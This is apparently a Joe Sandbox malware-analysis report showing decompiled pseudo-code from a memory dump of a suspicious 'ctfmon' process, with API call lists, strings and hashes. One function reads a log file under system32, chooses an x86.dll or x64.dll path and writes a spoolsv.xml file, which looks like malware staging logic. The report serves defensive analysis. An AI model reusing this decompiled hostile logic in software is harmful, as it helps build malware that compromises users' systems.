                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00981CE2,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981BCB
                                                • __alloca_probe_16.LIBCMT ref: 00981C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981BE2
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981C5E
                                                • __freea.LIBCMT ref: 00981C89
                                                • __freea.LIBCMT ref: 00981C95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID: /LU5/
                                                • API String ID: 201697637-937868281
                                                • Opcode ID: dbefcb341ca2c60778029dc747144157c5f4d94cc1ba1c5029160c7cba274444
                                                • Instruction ID: 8a064d56c3297b763d1d27d7fc43d7d3d07c58145120183310eaf873d32ee883
                                                • Opcode Fuzzy Hash: dbefcb341ca2c60778029dc747144157c5f4d94cc1ba1c5029160c7cba274444
                                                • Instruction Fuzzy Hash: 8191D272E112169ADF24AF64C881EFEBBBDAF49710F184659E845E7341E734CC42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00968BB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00968BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct _CRITICAL_SECTION _v56;
				long _v60;
				long _v64;
				void* _v68;
				char _v72;
				long _v76;
				void* __esi;
				signed int _t63;
				signed int _t64;
				void* _t67;
				void* _t75;
				void* _t82;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t100;
				intOrPtr* _t112;
				void* _t113;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t124;
				signed char* _t135;
				intOrPtr* _t139;
				intOrPtr _t142;
				void* _t146;
				struct _CRITICAL_SECTION* _t147;
				signed int _t148;
				void* _t149;
				void* _t150;
				void* _t151;

				_push(0xffffffff);
				_push(E00984728);
				_push( *[fs:0x0]);
				_t150 = _t149 - 0x3c;
				_t63 =  *0x98f008; // 0x35554c2f
				_t64 = _t63 ^ _t148;
				_v20 = _t64;
				_push(_t64);
				 *[fs:0x0] =  &_v16;
				_t145 = __ecx;
				_t117 = _a12;
				_t142 = _a4;
				_t139 = _a8;
				if(_t117 != 0) {
					__eflags = _t117 - 5;
					if(_t117 != 5) {
						L5:
						E00968690(_t142, _t139, _t117);
						_t67 = E009687A0(_t142);
						__eflags = _t67 - 0xd;
						if(_t67 > 0xd) {
							while(1) {
								_t112 =  *((intOrPtr*)(_t142 + 4));
								_t124 =  &_v28;
								_v28 =  *_t112;
								_v24 =  *((intOrPtr*)(_t112 + 4));
								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
									break;
								}
								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
									break;
								} else {
									_t113 =  *(_t112 + 5);
									_v32 = _t113;
									__eflags = _t113;
									if(_t113 != 0) {
										_t126 = _t142;
										_t75 = E009687A0(_t142);
										__eflags = _t75 - _t113;
										if(_t75 >= _t113) {
											_v76 = 0;
											E00968700(_t126,  &_v28, 5);
											E00968700(_t142,  &_v32, 4);
											E00968700(_t142,  &_v76, 4);
											_t115 = _v32 + 0xfffffff3;
											_push(_t115);
											_t82 = E00970AB4(_t145, __eflags);
											_t151 = _t150 + 4;
											_v32 = _t82;
											E00968700(_t142, _t82, _t115);
											_v72 = 0x98cab8;
											_v60 = 0;
											_v68 = 0;
											_v64 = 0;
											InitializeCriticalSection( &_v56);
											_v8 = 0;
											EnterCriticalSection( &_v56);
											_v64 = _v68;
											E00968840( &_v72, 0x400);
											LeaveCriticalSection( &_v56);
											EnterCriticalSection( &_v56);
											_t90 = _v68;
											__eflags = _t90;
											_t133 =  ==  ? 0 : _v64 - _t90;
											_t92 = E009687B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
											__eflags = _t92 - 0xffffffff;
											if(_t92 != 0xffffffff) {
												E00983DB0(_v64, _v32, _t115);
												_t151 = _t151 + 0xc;
												_t44 =  &_v64;
												 *_t44 = _v64 + _t115;
												__eflags =  *_t44;
											}
											LeaveCriticalSection( &_v56);
											_t135 = _v68;
											_t95 = ( *_t135 & 0x000000ff) - 0x34;
											__eflags = _t95;
											if(_t95 == 0) {
												L16:
												E009688D0(_t145);
											} else {
												__eflags = _t95 == 1;
												if(_t95 == 1) {
													 *(_t145 + 0xc) = _t135[8];
													 *(_t145 + 8) = _t135[4];
													goto L16;
												}
											}
											E00970AAF(_v32);
											_v8 = 0xffffffff;
											_t150 = _t151 + 4;
											_t98 = _v68;
											_v72 = 0x98cab8;
											__eflags = _t98;
											if(_t98 != 0) {
												VirtualFree(_t98, 0, 0x8000);
											}
											DeleteCriticalSection( &_v56);
											_t100 = E009687A0(_t142);
											__eflags = _t100 - 0xd;
											if(_t100 > 0xd) {
												continue;
											} else {
											}
										}
									}
								}
								goto L22;
							}
							_t147 = _t142 + 0x10;
							EnterCriticalSection(_t147);
							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
							E00968840(_t142, 0x400);
							LeaveCriticalSection(_t147);
						}
					} else {
						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
							goto L5;
						} else {
							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
								goto L5;
							}
						}
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
				}
				L22:
				 *[fs:0x0] = _v16;
				_pop(_t146);
				return E00970A5D(_v20 ^ _t148, _t146);
			}








































                                                0x00968bb3
                                                0x00968bb5
                                                0x00968bc0
                                                0x00968bc1
                                                0x00968bc4
                                                0x00968bc9
                                                0x00968bcb
                                                0x00968bd1
                                                0x00968bd5
                                                0x00968bdb
                                                0x00968bdd
                                                0x00968be0
                                                0x00968be3
                                                0x00968be8
                                                0x00968bf6
                                                0x00968bf9
                                                0x00968c15
                                                0x00968c19
                                                0x00968c20
                                                0x00968c25
                                                0x00968c28
                                                0x00968c30
                                                0x00968c30
                                                0x00968c33
                                                0x00968c38
                                                0x00968c3e
                                                0x00968c47
                                                0x00968c49
                                                0x00000000
                                                0x00000000
                                                0x00968c56
                                                0x00968c59
                                                0x00000000
                                                0x00968c5f
                                                0x00968c5f
                                                0x00968c62
                                                0x00968c65
                                                0x00968c67
                                                0x00968c6d
                                                0x00968c6f
                                                0x00968c74
                                                0x00968c76
                                                0x00968c81
                                                0x00968c89
                                                0x00968c96
                                                0x00968ca3
                                                0x00968cab
                                                0x00968cae
                                                0x00968caf
                                                0x00968cb4
                                                0x00968cb7
                                                0x00968cbe
                                                0x00968cc6
                                                0x00968cce
                                                0x00968cd5
                                                0x00968cdc
                                                0x00968ce3
                                                0x00968cec
                                                0x00968cf4
                                                0x00968d05
                                                0x00968d08
                                                0x00968d11
                                                0x00968d1b
                                                0x00968d21
                                                0x00968d2b
                                                0x00968d2d
                                                0x00968d37
                                                0x00968d3c
                                                0x00968d3f
                                                0x00968d48
                                                0x00968d4d
                                                0x00968d50
                                                0x00968d50
                                                0x00968d50
                                                0x00968d50
                                                0x00968d57
                                                0x00968d5d
                                                0x00968d63
                                                0x00968d63
                                                0x00968d66
                                                0x00968d79
                                                0x00968d7b
                                                0x00968d68
                                                0x00968d68
                                                0x00968d6b
                                                0x00968d70
                                                0x00968d76
                                                0x00000000
                                                0x00968d76
                                                0x00968d6b
                                                0x00968d83
                                                0x00968d88
                                                0x00968d8f
                                                0x00968d92
                                                0x00968d95
                                                0x00968d9c
                                                0x00968d9e
                                                0x00968da8
                                                0x00968da8
                                                0x00968db2
                                                0x00968dba
                                                0x00968dbf
                                                0x00968dc2
                                                0x00000000
                                                0x00000000
                                                0x00968dc8
                                                0x00968dc2
                                                0x00968c76
                                                0x00968c67
                                                0x00000000
                                                0x00968c59
                                                0x00968dca
                                                0x00968dce
                                                0x00968dde
                                                0x00968de1
                                                0x00968de7
                                                0x00968de7
                                                0x00968bfb
                                                0x00968bfd
                                                0x00968c03
                                                0x00000000
                                                0x00968c05
                                                0x00968c09
                                                0x00968c0f
                                                0x00000000
                                                0x00000000
                                                0x00968c0f
                                                0x00968c03
                                                0x00968bea
                                                0x00968bee
                                                0x00968bee
                                                0x00968ded
                                                0x00968df0
                                                0x00968df9
                                                0x00968e08

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 00968CE3
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 00968D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968D1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID: /LU5/
                                                • API String ID: 2951591641-937868281
                                                • Opcode ID: 3bb1018f96e09c0cc3081dd4dc46719b446607ad9bb9b599741bd24ac940adf5
                                                • Instruction ID: 3c2ed28f33c3e40f5a48efa8dd8dc1bd2a1909e3b27718ad9c7fb866a46ea396
                                                • Opcode Fuzzy Hash: 3bb1018f96e09c0cc3081dd4dc46719b446607ad9bb9b599741bd24ac940adf5
                                                • Instruction Fuzzy Hash: A86170B1A00609EBCF14DFA4D899BAEBBB9FF44310F144619E515E7391DF34A905CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009673E0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E009673E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void _v103188;
				long _v103192;
				void* _v103196;
				signed int _t29;
				void* _t43;
				char* _t44;
				intOrPtr _t51;
				int _t58;
				void* _t69;
				void* _t76;
				intOrPtr _t88;
				void* _t89;
				void* _t95;
				intOrPtr* _t96;
				long _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t101;

				E00983CA0();
				_t29 =  *0x98f008; // 0x35554c2f
				_v8 = _t29 ^ _t101;
				_t88 = _a4;
				_t69 = __edx;
				_v103196 = 0;
				_v103192 = 0;
				if(E00964E60(__ecx,  &_v103196,  &_v103192) != 0) {
					_push(__esi);
					E00973440(_t88,  &_v528, 0, 0x104);
					E00973440(_t88,  &_v268, 0, 0x104);
					E00965180( &_v528, 0x104, "%s\\x86.dll", _t69);
					E00965180( &_v268, 0x104, "%s\\x64.dll", _t69);
					E00973440(_t88,  &_v103188, 0, 0x19000);
					_t95 = _v103196;
					_t43 = E009676A0(_t95);
					if(_t43 == 0x20) {
						_t44 =  &_v528;
						goto L9;
					} else {
						if(_t43 == 0x40) {
							_t44 =  &_v268;
							L9:
							_push(_t44);
							E00965180( &_v103188, 0x19000,  *0x996834, _t88);
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							E00973440(_t88,  &_v788, 0, 0x104);
							E00965180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
							_t96 =  &_v103188;
							_t76 = _t96 + 1;
							do {
								_t51 =  *_t96;
								_t96 = _t96 + 1;
							} while (_t51 != 0);
							_v103192 = 0;
							_t97 = _t96 - _t76;
							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
							if(_t89 == 0) {
								goto L6;
							} else {
								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
								_push(_t89);
								if(_t58 != 0) {
									CloseHandle();
									_pop(_t99);
									return E00970A5D(_v8 ^ _t101, _t99);
								} else {
									CloseHandle();
									_pop(_t100);
									return E00970A5D(_v8 ^ _t101, _t100);
								}
							}
						} else {
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							L6:
							_pop(_t98);
							return E00970A5D(_v8 ^ _t101, _t98);
						}
					}
				} else {
					return E00970A5D(_v8 ^ _t101, __esi);
				}
			}


























                                                0x009673e8
                                                0x009673ed
                                                0x009673f4
                                                0x009673f9
                                                0x00967402
                                                0x00967404
                                                0x00967415
                                                0x00967429
                                                0x0096743b
                                                0x0096744a
                                                0x0096745d
                                                0x00967474
                                                0x0096748b
                                                0x0096749e
                                                0x009674a3
                                                0x009674ae
                                                0x009674b6
                                                0x009674e3
                                                0x00000000
                                                0x009674b8
                                                0x009674bb
                                                0x009674db
                                                0x009674e9
                                                0x009674e9
                                                0x009674fd
                                                0x00967507
                                                0x0096750a
                                                0x0096750a
                                                0x0096751e
                                                0x00967535
                                                0x0096753a
                                                0x00967543
                                                0x00967546
                                                0x00967546
                                                0x00967548
                                                0x00967549
                                                0x00967565
                                                0x00967570
                                                0x00967578
                                                0x0096757c
                                                0x00000000
                                                0x00967582
                                                0x00967594
                                                0x0096759a
                                                0x0096759d
                                                0x009675b8
                                                0x009675c3
                                                0x009675d0
                                                0x0096759f
                                                0x0096759f
                                                0x009675a5
                                                0x009675b7
                                                0x009675b7
                                                0x0096759d
                                                0x009674bd
                                                0x009674bf
                                                0x009674c2
                                                0x009674c2
                                                0x009674c8
                                                0x009674c8
                                                0x009674da
                                                0x009674da
                                                0x009674bb
                                                0x0096742b
                                                0x0096743a
                                                0x0096743a

                                                APIs
                                                  • Part of subcall function 00964E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 00964E81
                                                  • Part of subcall function 00964E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 00964EA1
                                                  • Part of subcall function 00964E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 00964EB3
                                                  • Part of subcall function 00964E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964ECF
                                                • LocalFree.KERNEL32(?), ref: 009674C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll$/LU5/
                                                • API String ID: 1503672127-1416297205
                                                • Opcode ID: c5490fade09fdb896544658cb6331d235a51c1b2aa262bf0e23f739a0515ea43
                                                • Instruction ID: d7b8cc0968e70bba30c6b23e9c1e606e843377e4a68e727467362e3a2fec7a43
                                                • Opcode Fuzzy Hash: c5490fade09fdb896544658cb6331d235a51c1b2aa262bf0e23f739a0515ea43
                                                • Instruction Fuzzy Hash: 9151FBB1A04218ABDB20DB54DC4AFEDB37CAB85B14F4000E5F919A7191DA709B84CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097A40F Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E0097A40F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x98f008; // 0x35554c2f
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0098002B(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t104);
					return E00970A5D(_v8 ^ _t106, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0097A677(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00977FD8(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0097A677(_t101);
									goto L36;
								}
								_t62 = E00977FD8(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0097A677(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00977882(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00983C70();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00977FD8(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00977882(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00983C70();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}




























                                                0x0097a414
                                                0x0097a415
                                                0x0097a416
                                                0x0097a41d
                                                0x0097a422
                                                0x0097a428
                                                0x0097a42e
                                                0x0097a434
                                                0x0097a437
                                                0x0097a437
                                                0x0097a43a
                                                0x0097a43c
                                                0x0097a43c
                                                0x0097a43a
                                                0x0097a43e
                                                0x0097a443
                                                0x0097a44a
                                                0x0097a44d
                                                0x0097a44d
                                                0x0097a469
                                                0x0097a46f
                                                0x0097a474
                                                0x0097a607
                                                0x0097a60b
                                                0x0097a61a
                                                0x0097a47a
                                                0x0097a47a
                                                0x0097a47d
                                                0x0097a482
                                                0x0097a486
                                                0x0097a4da
                                                0x0097a4da
                                                0x0097a4dc
                                                0x0097a4de
                                                0x0097a5fc
                                                0x0097a5fc
                                                0x0097a5fe
                                                0x0097a5ff
                                                0x00000000
                                                0x0097a605
                                                0x0097a4ef
                                                0x0097a4f5
                                                0x0097a4f7
                                                0x00000000
                                                0x00000000
                                                0x0097a4fd
                                                0x0097a50f
                                                0x0097a514
                                                0x0097a518
                                                0x00000000
                                                0x00000000
                                                0x0097a525
                                                0x0097a55f
                                                0x0097a562
                                                0x0097a565
                                                0x0097a567
                                                0x0097a569
                                                0x0097a56b
                                                0x0097a5b7
                                                0x0097a5b7
                                                0x0097a5b9
                                                0x0097a5b9
                                                0x0097a5bb
                                                0x0097a5f5
                                                0x0097a5f6
                                                0x00000000
                                                0x0097a5fb
                                                0x0097a5cf
                                                0x0097a5d4
                                                0x0097a5d6
                                                0x00000000
                                                0x00000000
                                                0x0097a5da
                                                0x0097a5db
                                                0x0097a5dc
                                                0x0097a5df
                                                0x0097a61b
                                                0x0097a61e
                                                0x0097a5e1
                                                0x0097a5e1
                                                0x0097a5e2
                                                0x0097a5e2
                                                0x0097a5ef
                                                0x0097a5f1
                                                0x0097a5f3
                                                0x0097a624
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097a5f3
                                                0x0097a56d
                                                0x0097a570
                                                0x0097a572
                                                0x0097a574
                                                0x0097a576
                                                0x0097a579
                                                0x0097a57e
                                                0x0097a599
                                                0x0097a59b
                                                0x0097a5a5
                                                0x0097a5a7
                                                0x0097a5a8
                                                0x0097a5aa
                                                0x00000000
                                                0x00000000
                                                0x0097a5ac
                                                0x0097a5b2
                                                0x0097a5b2
                                                0x00000000
                                                0x0097a5b2
                                                0x0097a580
                                                0x0097a582
                                                0x0097a586
                                                0x0097a58b
                                                0x0097a58d
                                                0x0097a58f
                                                0x00000000
                                                0x00000000
                                                0x0097a591
                                                0x00000000
                                                0x0097a591
                                                0x0097a527
                                                0x0097a52c
                                                0x00000000
                                                0x00000000
                                                0x0097a532
                                                0x0097a534
                                                0x00000000
                                                0x00000000
                                                0x0097a54b
                                                0x0097a550
                                                0x0097a554
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097a55a
                                                0x0097a48d
                                                0x0097a48f
                                                0x0097a491
                                                0x0097a499
                                                0x0097a4b8
                                                0x0097a4ba
                                                0x0097a4c4
                                                0x0097a4c6
                                                0x0097a4c7
                                                0x0097a4c9
                                                0x00000000
                                                0x00000000
                                                0x0097a4cf
                                                0x0097a4d5
                                                0x0097a4d5
                                                0x00000000
                                                0x0097a4d5
                                                0x0097a49d
                                                0x0097a4a1
                                                0x0097a4a6
                                                0x0097a4aa
                                                0x00000000
                                                0x00000000
                                                0x0097a4b0
                                                0x00000000
                                                0x0097a4b0

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,77109EB0,?,?,?,?,?,0097A660,00000001,00000001,?), ref: 0097A469
                                                • __alloca_probe_16.LIBCMT ref: 0097A4A1
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0097A660,00000001,00000001,?,00990E80,?,?), ref: 0097A4EF
                                                • __alloca_probe_16.LIBCMT ref: 0097A586
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00990E80,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0097A5E9
                                                • __freea.LIBCMT ref: 0097A5F6
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • __freea.LIBCMT ref: 0097A5FF
                                                • __freea.LIBCMT ref: 0097A624
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID: /LU5/
                                                • API String ID: 3864826663-937868281
                                                • Opcode ID: c4b8a47a4c46708481c5d4f88227bc15f04db3d3b72e3c92fb3242ad48ab480c
                                                • Instruction ID: c04ace08d18f21e0c52579fe6724e848ffff453b6cf153d18a8427662c21a1e2
                                                • Opcode Fuzzy Hash: c4b8a47a4c46708481c5d4f88227bc15f04db3d3b72e3c92fb3242ad48ab480c
                                                • Instruction Fuzzy Hash: D051BD73610216AFDB259F64CC45FAF77A9EBC4750F258628FC0CD6190EB74DC809AA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964E60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94filememoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E00964E60(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				void* __edi;
				struct _OVERLAPPED* _t19;
				void** _t22;
				long _t29;
				void* _t31;
				long _t33;
				void** _t36;
				struct _OVERLAPPED** _t37;
				long _t40;

				_t36 = __edx;
				_v12 = __edx;
				_t31 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t31 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t31,  &_v32);
					_t19 = _v32;
					_v20 = _t19;
					_t7 =  &(_t19->Internal); // 0x1
					_t39 = _t7;
					 *_t36 = LocalAlloc(0x40, _t7);
					E00973440(_t36, _t20, 0, _t39);
					_t22 = _t36;
					if( *_t22 != 0) {
						_t37 = _a4;
						_t33 = _v20;
						_t40 = _t33;
						 *_t37 = 0;
						if(_t33 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t31,  *_t22, _t40,  &_v16, 0);
								_t29 = _v16;
								if(_t29 == 0) {
									break;
								}
								 *_t37 =  *_t37 + _t29;
								_t40 = _t40 - _t29;
								_t22 = _v12;
								if(_t40 > 0) {
									continue;
								}
								break;
							}
							_t33 = _v20;
						}
						_push(_t31);
						if( *_t37 == _t33) {
							CloseHandle();
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0;
						}
					} else {
						CloseHandle(_t31);
						goto L3;
					}
				}
			}

















                                                0x00964e7b
                                                0x00964e7e
                                                0x00964e87
                                                0x00964e8c
                                                0x00964ed5
                                                0x00964edd
                                                0x00964e8e
                                                0x00964e91
                                                0x00964e9a
                                                0x00964ea1
                                                0x00964ea7
                                                0x00964eaa
                                                0x00964ead
                                                0x00964ead
                                                0x00964ebd
                                                0x00964ebf
                                                0x00964ec4
                                                0x00964ecc
                                                0x00964ede
                                                0x00964ee1
                                                0x00964ee4
                                                0x00964ee6
                                                0x00964eee
                                                0x00964ef0
                                                0x00964ef5
                                                0x00964f01
                                                0x00964f07
                                                0x00964f0c
                                                0x00000000
                                                0x00000000
                                                0x00964f0e
                                                0x00964f10
                                                0x00964f12
                                                0x00964f17
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00964f17
                                                0x00964f19
                                                0x00964f19
                                                0x00964f1c
                                                0x00964f1f
                                                0x00964f3b
                                                0x00964f49
                                                0x00964f21
                                                0x00964f21
                                                0x00964f2c
                                                0x00964f3a
                                                0x00964f3a
                                                0x00964ece
                                                0x00964ecf
                                                0x00000000
                                                0x00964ecf
                                                0x00964ecc

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 00964E81
                                                • GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 00964EA1
                                                • LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 00964EB3
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964ECF
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B76490), ref: 00964F01
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964F21
